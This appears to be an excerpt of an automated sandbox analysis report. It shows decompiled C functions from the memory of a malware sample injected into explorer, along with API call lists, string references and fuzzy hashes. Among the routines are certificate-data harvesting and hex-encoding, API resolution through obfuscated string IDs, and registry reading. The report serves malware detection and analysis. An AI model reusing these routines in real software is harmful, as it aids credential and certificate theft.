					if(_t62 == 0) {
						L8:
						_t69 = lstrlenW(_v8) + _t27;
						_t28 = E0151C010(_v8, lstrlenW(_v8) + _t27);
						_v12 = _t28;
						if(_t28 != 0) {
							E01515AF0(5, _t28);
						}
						E01513990( &_v8, _t69);
						E01513990( &_v12, 0);
						return 0;
					}
					do {
						_t60 = 7;
						_v44 = 0;
						memset( &_v43, 0, _t60 << 2);
						asm("stosw");
						asm("stosb");
						lstrcatW(_v8, _t62 + 4);
						lstrcatW(_v8, ";");
						_t40 =  *0x1537980; // 0x0
						E01513F50(0,  *((intOrPtr*)(_t40 + 0x204)),  &_v44, 0xa);
						E01513BA0(0,  &_v108, 0, 0x40);
						E01516E70(0,  &_v44,  &_v108, 0x20);
						_t72 = _t72 + 0x30;
						lstrcatW(_v8,  &_v108);
						_t49 =  *0x1537980; // 0x0
						if( *_t49 != 0) {
							lstrcatW(_v8, "|");
						}
						_t50 =  *0x1537980; // 0x0
						_t62 =  *_t50;
						 *0x1537980 = _t62;
					} while (_t62 != 0);
					goto L8;
				}
				return _t26 | 0xffffffff;
			}

0x01504c56
0x01504c6a
0x01504c6d
0x01504c70
0x01504c76
0x01504c7b
0x01504c85
0x01504c8c
0x01504c94
0x01504d2a
0x01504d33
0x01504d3a
0x01504d41
0x01504d46
0x01504d4b
0x01504d51
0x01504d57
0x01504d61
0x00000000
0x01504d6b
0x01504ca1
0x01504ca3
0x01504ca4
0x01504cac
0x01504cb1
0x01504cb7
0x01504cb8
0x01504cc2
0x01504cca
0x01504cd5
0x01504ce1
0x01504cf0
0x01504cf5
0x01504cff
0x01504d01
0x01504d08
0x01504d12
0x01504d12
0x01504d14
0x01504d19
0x01504d1b
0x01504d21
0x00000000
0x01504d29
0x00000000

APIs

Part of subcall function 01513960: HeapAlloc.KERNEL32(018E0000,00000008,0152C2F8,?,?,01513A10,015150C5,?,?,015150C6,0152C2F8,00000839), ref: 01513971

lstrcatW.KERNEL32(?,-00000004), ref: 01504CB8
lstrcatW.KERNEL32(?,0152A3F4), ref: 01504CC2
lstrcatW.KERNEL32(?,?), ref: 01504CFF
lstrcatW.KERNEL32(?,0152A3F0), ref: 01504D12
lstrlenW.KERNEL32(?), ref: 01504D2D

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$AllocHeaplstrlen
String ID:
API String ID: 2086708719-0
Opcode ID: d317a6822a2ce8183d80bbc1b4ec776805015b944c44b62ff661b2e2ef9a91ff
Instruction ID: 329276f84b3f289080f0786684f922045d3ba428326d9bba96472ae75c350dd8
Opcode Fuzzy Hash: d317a6822a2ce8183d80bbc1b4ec776805015b944c44b62ff661b2e2ef9a91ff
Instruction Fuzzy Hash: 1F3130B3D00209BFDB12EFA8DC859DE7BB9FB59310F110566E214EB294D7709944AB50

Uniqueness

Uniqueness Score: 1.18%

Function 015033DF, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 100
stringUNIQUE

Download Yara Rule

C-Code - Quality: 89%

			E015033DF(void* __ecx, intOrPtr _a4, intOrPtr _a8, CHAR* _a12, CHAR* _a16) {
				signed int _v8;
				void* _v15;
				char _v16;
				char _v528;
				void* __esi;
				signed int _t31;
				CHAR* _t54;
				void* _t56;
				void* _t58;
				void* _t60;
				void* _t67;
				void* _t68;
				void* _t69;

				_t56 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t54 = _a12;
				E015033AC(_t54);
				E015033AC(_a16);
				_t31 = E01519210(_t56);
				_v8 = _t31;
				if(_t31 != 0) {
					E01519280(_t56, _t31,  *0x153ab0c);
					_t58 = _t60;
					if(lstrlenA(_t54) > 0xc8) {
						_t54[0xc8] = 0;
					}
					if(lstrlenA(_a16) > 0xc8) {
						_a16[0xc8] = 0;
					}
					_push(_a16);
					E01513C30( &_v528, 0x1ff, " cert_name=[%s|%s]", _t54);
					E01519300(_v8,  &_v528);
					_t55 = _a4;
					_t67 = 0;
					_t69 = _t68 + 0x1c;
					if(_a4 != 0 && _a8 > 0) {
						_v16 = 0;
						asm("stosd");
						E01519300(_v8, " cert_data=[");
						E01513BA0(_t58,  &_v16, 0, 5);
						_t69 = _t69 + 0x14;
						if(_a8 > 0) {
							do {
								E01513C30( &_v16, 4, "%%%02X",  *(_t67 + _t55) & 0x000000ff);
								E01519300(_v8,  &_v16);
								_t69 = _t69 + 0x18;
								_t67 = _t67 + 1;
							} while (_t67 < _a8);
						}
						E01519300(_v8, 0x152a380);
						_pop(_t58);
					}
					E01519300(_v8, 0x152a37c);
					E015195E0(_t58,  &_v8);
				}
				return 0;
			}

0x015033df
0x015033e8
0x015033ed
0x015033f3
0x015033fb
0x01503400
0x01503405
0x0150340a
0x01503418
0x01503424
0x0150342f
0x01503431
0x01503431
0x0150343f
0x01503444
0x01503444
0x0150344b
0x01503460
0x0150346f
0x01503474
0x01503477
0x01503479
0x0150347e
0x0150348f
0x01503496
0x01503497
0x015034a3
0x015034a8
0x015034ae
0x015034b0
0x015034c0
0x015034cc
0x015034d1
0x015034d4
0x015034d5
0x015034b0
0x015034e2
0x015034e8
0x015034e8
0x015034f1
0x015034fa
0x01503502
0x01503508

APIs

Part of subcall function 015033AC: lstrlenA.KERNEL32(?,015033F8), ref: 015033AD

Part of subcall function 01519280: GetLocalTime.KERNEL32(00000000), ref: 0151929D

lstrlenA.KERNEL32(?), ref: 01503426
lstrlenA.KERNEL32(?), ref: 0150343B

Strings

cert_name=[%s|%s], xrefs: 01503455
cert_data=[, xrefs: 01503485
%%%02X, xrefs: 015034B5

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$LocalTime
String ID: cert_data=[$ cert_name=[%s|%s]$%%%02X
API String ID: 3297435055-2656545438
Opcode ID: d3b85fdb61b77c1071fc5c2eefd609d8e8419d0cf691148d1f04bc4f8cfa88d5
Instruction ID: bbb9d1d2d20c34c2ba8b9cb33a605eca3d6023f87977a55d54454f347bfba184
Opcode Fuzzy Hash: d3b85fdb61b77c1071fc5c2eefd609d8e8419d0cf691148d1f04bc4f8cfa88d5
Instruction Fuzzy Hash: FE31B27690021ABFEF23EFA4CC45EDE7768BF64314F1544A5E510AF0C1D675AA04CBA1

Uniqueness

Uniqueness Score: 100.00%

Function 015129C5, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E015129C5(void* _a4, intOrPtr _a8) {
				void* _t44;
				signed int _t45;
				void* _t46;
				signed int _t47;
				intOrPtr* _t58;
				void* _t61;
				char* _t68;
				intOrPtr _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t76 = _a4;
				if(_t76 == 0) {
					_push("crypto\\digest\\sha1.c");
					_push("psAssert %s");
					_t61 = E01510CBC(_t44);
					_push(0xdb);
					_push(":%d ");
					E01510CBC(_t61);
					E01510B84("md != NULL");
					_t77 = _t77 + 0x14;
				}
				_t45 =  *(_t76 + 0x1c);
				if(_t45 >= 0x40) {
					L14:
					_push(0xfffffffa);
				} else {
					_t74 = _a8;
					if(_t74 == 0) {
						goto L14;
					} else {
						 *_t76 =  *_t76 + (_t45 << 3);
						asm("adc [esi+0x4], ebx");
						 *((char*)(_t45 + _t76 + 0x20)) = 0x80;
						 *(_t76 + 0x1c) =  *(_t76 + 0x1c) + 1;
						_t47 =  *(_t76 + 0x1c);
						if(_t47 > 0x38) {
							while(_t47 < 0x40) {
								 *((char*)(_t47 + _t76 + 0x20)) = 0;
								 *(_t76 + 0x1c) =  *(_t76 + 0x1c) + 1;
								_t47 =  *(_t76 + 0x1c);
							}
							E01512890(_t76);
							 *(_t76 + 0x1c) = 0;
							L10:
							while( *(_t76 + 0x1c) < 0x38) {
								 *((char*)( *(_t76 + 0x1c) + _t76 + 0x20)) = 0;
								 *(_t76 + 0x1c) =  *(_t76 + 0x1c) + 1;
							}
							 *((char*)(_t76 + 0x58)) =  *((intOrPtr*)(_t76 + 7));
							 *((char*)(_t76 + 0x59)) =  *((intOrPtr*)(_t76 + 6));
							 *((char*)(_t76 + 0x5a)) =  *((intOrPtr*)(_t76 + 5));
							 *((char*)(_t76 + 0x5b)) =  *((intOrPtr*)(_t76 + 4));
							 *((char*)(_t76 + 0x5c)) =  *((intOrPtr*)(_t76 + 3));
							 *((char*)(_t76 + 0x5d)) =  *((intOrPtr*)(_t76 + 2));
							 *((char*)(_t76 + 0x5e)) =  *((intOrPtr*)(_t76 + 1));
							 *((char*)(_t76 + 0x5f)) =  *_t76;
							E01512890(_t76);
							_t68 = _t74 + 2;
							_t58 = _t76 + 0xa;
							_t75 = 5;
							do {
								 *((char*)(_t68 - 2)) =  *((intOrPtr*)(_t58 + 1));
								 *((char*)(_t68 - 1)) =  *_t58;
								 *_t68 =  *((intOrPtr*)(_t58 - 1));
								 *((char*)(_t68 + 1)) =  *((intOrPtr*)(_t58 - 2));
								_t58 = _t58 + 4;
								_t68 = _t68 + 4;
								_t75 = _t75 - 1;
							} while (_t75 != 0);
							memset(_t76, 0, 0xd0);
							_push(0x14);
							goto L15;
						}
						goto L10;
					}
				}
				L15:
				_pop(_t46);
				return _t46;
			}

0x015129ca
0x015129d2
0x015129d4
0x015129d9
0x015129de
0x015129e3
0x015129e8
0x015129ed
0x015129f7
0x015129fc
0x015129fc
0x015129ff
0x01512a05
0x01512ace
0x01512ace
0x01512a0b
0x01512a0b
0x01512a10
0x00000000
0x01512a16
0x01512a1b
0x01512a1d
0x01512a20
0x01512a25
0x01512a28
0x01512a2e
0x01512a3c
0x01512a32
0x01512a36
0x01512a39
0x01512a39
0x01512a42
0x01512a48
0x00000000
0x01512a57
0x01512a50
0x01512a54
0x01512a54
0x01512a60
0x01512a66
0x01512a6c
0x01512a72
0x01512a78
0x01512a7e
0x01512a84
0x01512a8a
0x01512a8d
0x01512a95
0x01512a98
0x01512a9b
0x01512a9c
0x01512a9f
0x01512aa4
0x01512aaa
0x01512aaf
0x01512ab2
0x01512ab5
0x01512ab8
0x01512ab8
0x01512ac2
0x01512aca
0x00000000
0x01512aca
0x00000000
0x01512a2e
0x01512a10
0x01512ad0
0x01512ad0
0x01512ad5

APIs

memset.MSVCRT(?,00000000,000000D0,?,?,?,?,01510E1B,?,?), ref: 01512AC2

Strings

crypto\digest\sha1.c, xrefs: 015129D4
psAssert %s, xrefs: 015129D9
:%d , xrefs: 015129E8
md != NULL, xrefs: 015129F2

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memset
String ID: :%d $crypto\digest\sha1.c$md != NULL$psAssert %s
API String ID: 2221118986-1124679680
Opcode ID: 9ad319584fbe2095beb589671fa384f5a46a57636125db2a03575c90f0f85109
Instruction ID: a2f55f596c18fa398d1c04791083c391c178a8e141d23655f91181619486bb48
Opcode Fuzzy Hash: 9ad319584fbe2095beb589671fa384f5a46a57636125db2a03575c90f0f85109
Instruction Fuzzy Hash: AA31E936109BC19DE3339F6884404ABFFF1BE26114B28899ED4D65FB83D291E90AC721

Uniqueness

Uniqueness Score: 10.55%

Function 003FE0A0, Relevance: 7.6, APIs: 5, Instructions: 95
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E003FE0A0(void* _a4, short* _a8, short* _a12, intOrPtr* _a16) {
				char* _v8;
				int _v12;
				void* _v16;
				int _v20;
				long _v24;
				char* _t39;
				void* _t65;

				_v12 = 0;
				_v20 = 0;
				_v24 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v16);
				if(_v24 == 0) {
					_t54 = _v16;
					_v24 = RegQueryValueExW(_v16, _a12, 0,  &_v12, 0,  &_v20);
					if(_v24 == 0) {
						_t39 = E003F3EE0(_t54, _v20);
						_t65 = _t65 + 4;
						_v8 = _t39;
						if(_v8 != 0) {
							_v24 = RegQueryValueExW(_v16, _a12, 0, 0, _v8,  &_v20);
							if(_v24 == 0) {
								if(_a16 != 0) {
									 *_a16 = _v20;
								}
								RegCloseKey(_v16);
								return _v8;
							}
							while(0 != 0) {
							}
							L17:
							if(_v8 != 0) {
								E003F3F10( &_v8, 0xfffffffe);
							}
							if(_v16 != 0) {
								RegCloseKey(_v16);
							}
							return 0;
						}
						while(0 != 0) {
						}
						goto L17;
					}
					goto L17;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x003fe0a6
0x003fe0ad
0x003fe0b4
0x003fe0bb
0x003fe0c2
0x003fe0e2
0x003fe0e9
0x003fe108
0x003fe112
0x003fe119
0x003fe121
0x003fe126
0x003fe129
0x003fe130
0x003fe154
0x003fe15b
0x003fe169
0x003fe171
0x003fe171
0x003fe177
0x00000000
0x003fe17d
0x003fe15d
0x003fe161
0x003fe182
0x003fe186
0x003fe18e
0x003fe193
0x003fe19a
0x003fe1a0
0x003fe1a0
0x00000000
0x003fe1a6
0x003fe132
0x003fe136
0x00000000
0x003fe138
0x00000000
0x003fe11b
0x003fe0eb
0x003fe0ef
0x00000000

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 003FE0DC
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003FE10C
RegCloseKey.ADVAPI32(?), ref: 003FE1A0

Part of subcall function 003F3EE0: HeapAlloc.KERNEL32(015A0000,00000008,00405340,?,?,003F3F90,003F7DD5,?,?,003F7DD6,00405340,00000839), ref: 003F3EF1

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?), ref: 003FE14E
RegCloseKey.ADVAPI32(?), ref: 003FE177

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseQueryValue$AllocHeapOpen
String ID:
API String ID: 872537407-0
Opcode ID: 1f742d8c1136137efcad534776f3887dca66ed4a1b9b5192b30a9effb3040852
Instruction ID: 786d2fbd734ae79991149339656a7c609f49850c1bc753740b0d715c0cecf13a
Opcode Fuzzy Hash: 1f742d8c1136137efcad534776f3887dca66ed4a1b9b5192b30a9effb3040852
Instruction Fuzzy Hash: FE316DB4D0120DEFDB15CFA5C948BBF77B9EB48300F108568E611A72A0D7749B44DBA1

Uniqueness

Uniqueness Score: 0.90%

Function 0150EF5D, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0150EF5D(void* __ecx, void* __edx, intOrPtr _a4, signed char** _a8, signed char* _a12, void* _a16) {
				char _v8;
				signed char* _t27;
				void* _t31;
				void* _t43;
				void* _t53;
				signed char* _t55;
				void* _t58;
				intOrPtr _t59;
				void* _t61;
				void* _t63;
				void* _t64;
				void* _t65;

				_t53 = __edx;
				_t61 = _a16;
				_t55 =  *_a8;
				memset(_t61, 0, 0x8c);
				_t27 = _a12;
				_t64 = _t63 + 0xc;
				if(_t27 < 1) {
					L10:
					_push(0xffffffe1);
					_pop(0);
				} else {
					_a12 =  &(_t55[1]);
					if( *_t55 != 3) {
						goto L10;
					} else {
						_t5 = _t27 - 1; // 0x112
						_t58 = _t5;
						_t31 = E0150EE0B( &_a12, _t58,  &_v8);
						_t65 = _t64 + 0xc;
						if(_t31 < 0 || _t58 < _v8) {
							goto L10;
						} else {
							_t33 =  *_a12 & 0x000000ff;
							_a12 =  &(_a12[1]);
							if(( *_a12 & 0x000000ff) != 0) {
								_push("crypto\\keyformat\\asn1.c");
								_push("psAssert %s");
								_t43 = E01510CBC(_t33);
								_push(0x1e0);
								_push(":%d ");
								E01510CBC(_t43);
								E01510B84("ignore_bits == 0");
								_t65 = _t65 + 0x14;
							}
							if(E0150EF0B( &_a12, _v8,  &_v8) < 0) {
								goto L10;
							} else {
								_t59 = _a4;
								_t48 = _t61 + 0x20;
								if(E0150EE8A(_t59,  &_a12, _v8, _t61 + 0x20) < 0 || E0150EE8A(_t59,  &_a12, _v8, _t61) < 0) {
									goto L10;
								} else {
									 *((intOrPtr*)(_t61 + 0x80)) = E0150F57B(_t53, _t48);
									 *((intOrPtr*)(_t61 + 0x88)) = _t59;
									 *_a8 = _a12;
								}
							}
						}
					}
				}
				return 0;
			}

0x0150ef5d
0x0150ef66
0x0150ef6a
0x0150ef74
0x0150ef79
0x0150ef7c
0x0150ef82
0x0150f05a
0x0150f05a
0x0150f05c
0x0150ef88
0x0150ef8b
0x0150ef91
0x00000000
0x0150ef97
0x0150ef97
0x0150ef97
0x0150efa3
0x0150efa8
0x0150efad
0x00000000
0x0150efbc
0x0150efbf
0x0150efc2
0x0150efc7
0x0150efc9
0x0150efce
0x0150efd3
0x0150efd8
0x0150efdd
0x0150efe2
0x0150efec
0x0150eff1
0x0150eff1
0x0150f009
0x00000000
0x0150f00b
0x0150f00b
0x0150f00e
0x0150f024
0x00000000
0x0150f03b
0x0150f041
0x0150f04e
0x0150f054
0x0150f056
0x0150f024
0x0150f009
0x0150efad
0x0150ef91
0x0150f061

APIs

memset.MSVCRT(?,00000000,0000008C,00000000,7601A23A,00000000,0000008C,?,0150A73E,00000000,?,00000113,00000000,7601A23A,?), ref: 0150EF74

Strings

psAssert %s, xrefs: 0150EFCE
ignore_bits == 0, xrefs: 0150EFE7
:%d , xrefs: 0150EFDD
crypto\keyformat\asn1.c, xrefs: 0150EFC9

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memset
String ID: :%d $crypto\keyformat\asn1.c$ignore_bits == 0$psAssert %s
API String ID: 2221118986-2374335502
Opcode ID: 50a32a9bc8640552907f7485438f082cce68155138ddfd3461ebf12c5b3c9680
Instruction ID: 7a228f4aac65ece27362ae646f42b836f92ffee1749bcd0edc54195eb8e159f4
Opcode Fuzzy Hash: 50a32a9bc8640552907f7485438f082cce68155138ddfd3461ebf12c5b3c9680
Instruction Fuzzy Hash: FF31A27260024BEBDB12DFA4CC41EAF7BA8FF55744F14081AFA15DB180E671EA118760

Uniqueness

Uniqueness Score: 10.55%

Function 0151F100, Relevance: 7.6, APIs: 5, Instructions: 91
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0151F100(void* __ecx) {
				CHAR* _v8;
				CHAR* _v12;
				struct HINSTANCE__* _v16;
				CHAR* _v20;
				intOrPtr _v24;
				CHAR* _v28;
				CHAR* _v32;

				_v24 = 1;
				_v8 = E01515350(__ecx, 0xb1c);
				_v16 = GetModuleHandleA(_v8);
				_t49 =  &_v8;
				E01515460( &_v8);
				_v20 = E01515350( &_v8, 0x1d5d);
				_v32 = E01515350( &_v8, 0x1e12);
				_v28 = E01515350(_t49, 0x1625);
				_v12 = E01515350(_t49, 0x1552);
				 *0x153a984 = GetProcAddress(_v16, _v20);
				if( *0x153a984 != 0) {
					 *0x153a988 = GetProcAddress(_v16, _v32);
					if( *0x153a988 != 0) {
						 *0x153a98c = GetProcAddress(_v16, _v28);
						if( *0x153a98c != 0) {
							 *0x153a990 = GetProcAddress(_v16, _v12);
							if( *0x153a990 == 0) {
								_v24 = 0;
							}
						} else {
							_v24 = 0;
						}
					} else {
						_v24 = 0;
					}
				} else {
					_v24 = 0;
				}
				E01515460( &_v20);
				E01515460( &_v32);
				E01515460( &_v28);
				E01515460( &_v12);
				return _v24;
			}

0x0151f106
0x0151f11a
0x0151f127
0x0151f12a
0x0151f12e
0x0151f143
0x0151f153
0x0151f163
0x0151f173
0x0151f184
0x0151f190
0x0151f1a9
0x0151f1b5
0x0151f1ce
0x0151f1da
0x0151f1f3
0x0151f1ff
0x0151f201
0x0151f201
0x0151f1dc
0x0151f1dc
0x0151f1dc
0x0151f1b7
0x0151f1b7
0x0151f1b7
0x0151f192
0x0151f192
0x0151f192
0x0151f20c
0x0151f218
0x0151f224
0x0151f230
0x0151f23e

APIs

GetModuleHandleA.KERNEL32(0151F6C5), ref: 0151F121
GetProcAddress.KERNEL32(?,?), ref: 0151F17E
GetProcAddress.KERNEL32(?,?), ref: 0151F1A3

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID:
API String ID: 667068680-0
Opcode ID: fc75cfe0862ad23c5958e7852d119af43705b1778c13235c2e4b7d3909239b73
Instruction ID: 0614598065c0bd420660fea8ccc2547ec698ffe2e6d5373a140e768b007218d9
Opcode Fuzzy Hash: fc75cfe0862ad23c5958e7852d119af43705b1778c13235c2e4b7d3909239b73
Instruction Fuzzy Hash: 7E31D4FAC1020ADFEB11EFE0E8057EEB7B4BB95304F054429D526AB244E775560CDB92

Uniqueness

Uniqueness Score: 0.28%

Function 003FB590, Relevance: 7.6, APIs: 5, Instructions: 91
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E003FB590(void* __ecx) {
				CHAR* _v8;
				CHAR* _v12;
				struct HINSTANCE__* _v16;
				CHAR* _v20;
				intOrPtr _v24;
				CHAR* _v28;
				CHAR* _v32;

				_v24 = 1;
				_v8 = E003F8060(__ecx, 0xb1c);
				_v16 = GetModuleHandleA(_v8);
				_t49 =  &_v8;
				E003F8170( &_v8);
				_v20 = E003F8060( &_v8, 0x1d5d);
				_v32 = E003F8060( &_v8, 0x1e12);
				_v28 = E003F8060(_t49, 0x1625);
				_v12 = E003F8060(_t49, 0x1552);
				 *0x4116f4 = GetProcAddress(_v16, _v20);
				if( *0x4116f4 != 0) {
					 *0x4116f8 = GetProcAddress(_v16, _v32);
					if( *0x4116f8 != 0) {
						 *0x4116fc = GetProcAddress(_v16, _v28);
						if( *0x4116fc != 0) {
							 *0x411700 = GetProcAddress(_v16, _v12);
							if( *0x411700 == 0) {
								_v24 = 0;
							}
						} else {
							_v24 = 0;
						}
					} else {
						_v24 = 0;
					}
				} else {
					_v24 = 0;
				}
				E003F8170( &_v20);
				E003F8170( &_v32);
				E003F8170( &_v28);
				E003F8170( &_v12);
				return _v24;
			}

0x003fb596
0x003fb5aa
0x003fb5b7
0x003fb5ba
0x003fb5be
0x003fb5d3
0x003fb5e3
0x003fb5f3
0x003fb603
0x003fb614
0x003fb620
0x003fb639
0x003fb645
0x003fb65e
0x003fb66a
0x003fb683
0x003fb68f
0x003fb691
0x003fb691
0x003fb66c
0x003fb66c
0x003fb66c
0x003fb647
0x003fb647
0x003fb647
0x003fb622
0x003fb622
0x003fb622
0x003fb69c
0x003fb6a8
0x003fb6b4
0x003fb6c0
0x003fb6ce

APIs

GetModuleHandleA.KERNEL32(003FBDC5), ref: 003FB5B1
GetProcAddress.KERNEL32(?,?), ref: 003FB60E
GetProcAddress.KERNEL32(?,?), ref: 003FB633

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID:
API String ID: 667068680-0
Opcode ID: 65ffa7a17646e1d08fbf42a2aad63ad6577254768ce9b1d0522cd7457b5e2072
Instruction ID: 683cb21265e504c82f322b71ef2ca8e382f9b94f20503c63f9c51c5dacc8d4c1
Opcode Fuzzy Hash: 65ffa7a17646e1d08fbf42a2aad63ad6577254768ce9b1d0522cd7457b5e2072
Instruction Fuzzy Hash: 3F315EF5C0020DEFDF05EFE0E845AFEB7B4AB04304F148529E716A6251EB359604CBA6

Uniqueness

Uniqueness Score: 0.28%

Function 01521F10, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E01521F10(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				signed int _v8;
				char _v12;
				char _v13;
				char _v172;
				char _v173;
				char _v332;
				void* _t28;
				char* _t33;
				signed int _t36;
				char* _t47;
				void* _t48;
				void* _t49;
				void* _t50;

				_t48 = __esi;
				_t37 = _t36 | 0xffffffff;
				_v8 = _t36 | 0xffffffff;
				_v12 = 0;
				_t47 =  &_v172;
				if(_a4 != 0) {
					_push( &_a16);
					_push(_a12);
					_push(0xa0);
					_push(_t47);
					L015290BA();
					_t50 = _t49 + 0x10;
					_v13 = 0;
					if(__esi == 0) {
						L12:
						return E01524880(_a4, _t37, _v8, _v12, _a8, 0x15301cc, _t47);
					}
					_t8 = _t48 + 0x28; // 0x1523125
					_t33 = E01524960(_t8);
					_t9 = _t48 + 0x1c; // 0xf45d89f0
					_t10 = _t48 + 0x24; // 0x17eae8
					_t11 = _t48 + 0x18; // 0x5d8904c4
					_t37 =  *_t11;
					_t50 = _t50 + 4;
					_v8 =  *_t9;
					_v12 =  *_t10;
					if(_t33 == 0 ||  *_t33 == 0) {
						if(_a8 == 8) {
							_a8 = 6;
						}
						if( *((intOrPtr*)(_t48 + 0x14)) != 0xfffffffe) {
							_push( &_v172);
							_push("%s near end of file");
							_push(0xa0);
							_push( &_v332);
							L015290C0();
							_t50 = _t50 + 0x10;
							goto L11;
						} else {
							_t47 =  &_v172;
							goto L12;
						}
					} else {
						if( *((intOrPtr*)(__esi + 0x2c)) > 0x14) {
							goto L12;
						}
						_push(_t33);
						_push(_t47);
						_push("%s near \'%s\'");
						_push(0xa0);
						_push( &_v332);
						L015290C0();
						_t50 = _t50 + 0x14;
						L11:
						_t47 =  &_v332;
						_v173 = 0;
						goto L12;
					}
				}
				return _t28;
			}

0x01521f10
0x01521f1a
0x01521f22
0x01521f25
0x01521f2c
0x01521f32
0x01521f3e
0x01521f3f
0x01521f42
0x01521f47
0x01521f48
0x01521f4d
0x01521f50
0x01521f56
0x01521fed
0x00000000
0x01522009
0x01521f5c
0x01521f60
0x01521f65
0x01521f68
0x01521f6b
0x01521f6b
0x01521f6e
0x01521f71
0x01521f74
0x01521f79
0x01521fa9
0x01521fab
0x01521fab
0x01521fb6
0x01521fc6
0x01521fc7
0x01521fd2
0x01521fd7
0x01521fd8
0x01521fdd
0x00000000
0x01521fb8
0x01521fb8
0x00000000
0x01521fb8
0x01521f80
0x01521f84
0x00000000
0x00000000
0x01521f86
0x01521f89
0x01521f8a
0x01521f95
0x01521f9a
0x01521f9b
0x01521fa0
0x01521fe0
0x01521fe0
0x01521fe6
0x00000000
0x01521fe6
0x01521f79
0x01522011

APIs

_vsnprintf.MSVCRT(?,000000A0,?,015220D2,015230FD,00000000), ref: 01521F48
_snprintf.MSVCRT(?,000000A0,%s near '%s',?,00000000,?,?,?,015230FD,00000000), ref: 01521F9B
_snprintf.MSVCRT(?,000000A0,%s near end of file,?,?,?,?,015230FD,00000000), ref: 01521FD8

Strings

%s near end of file, xrefs: 01521FC7
%s near '%s', xrefs: 01521F8A

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: _snprintf$_vsnprintf
String ID: %s near '%s'$%s near end of file
API String ID: 372289625-424205537
Opcode ID: 378b12b98b5e2ff88a00ad0bf8dc9c9052467bbaa7a428ca7444ebb00407b5fc
Instruction ID: 7eae1f09bba6b7b6d2b882f0448b332fc593e703d841e1a5c4a6180fa90f3fb1
Opcode Fuzzy Hash: 378b12b98b5e2ff88a00ad0bf8dc9c9052467bbaa7a428ca7444ebb00407b5fc
Instruction Fuzzy Hash: 0631B872A00318AFDB20CE58CC40F9FB7B9BB96314F004589E9685B2C0D775AA44CB71

Uniqueness

Uniqueness Score: 5.54%

Function 01516FF0, Relevance: 7.6, APIs: 6, Instructions: 76
stringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E01516FF0(CHAR* _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				CHAR** _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _t34;
				void* _t48;
				int _t50;

				_v8 =  &_a16;
				_v12 = 0;
				_v16 = 0;
				while( *_v8 != 0) {
					_t50 = lstrlenA( *_v8);
					_v12 = _t50 + lstrlenA(_a4);
					_v8 =  &(_v8[1]);
				}
				if(_a12 != 0) {
					_t48 = _a12 - 1;
					if(_v12 > _t48) {
						while(0 != 0) {
						}
						return _t48;
					}
				}
				_v16 = 0;
				_v8 =  &_a16;
				while(1) {
					_t34 = _v8;
					if( *_t34 == 0) {
						break;
					}
					lstrcpyA(_a8 + _v16,  *_v8);
					_v16 = lstrlenA( *_v8) + _v16;
					_v8 =  &(_v8[1]);
					if( *_v8 != 0) {
						lstrcpyA(_a8 + _v16, _a4);
						_v16 = lstrlenA(_a4) + _v16;
					}
				}
				return _t34;
			}

0x01516ffa
0x01516ffd
0x01517004
0x0151700b
0x01517019
0x0151702d
0x01517036
0x01517036
0x0151703f
0x01517044
0x0151704a
0x0151704c
0x01517050
0x00000000
0x0151704c
0x0151704a
0x01517054
0x0151705e
0x01517061
0x01517061
0x01517067
0x00000000
0x00000000
0x01517076
0x0151708b
0x01517094
0x0151709d
0x015170aa
0x015170bd
0x015170bd
0x015170c0
0x015170c6

APIs

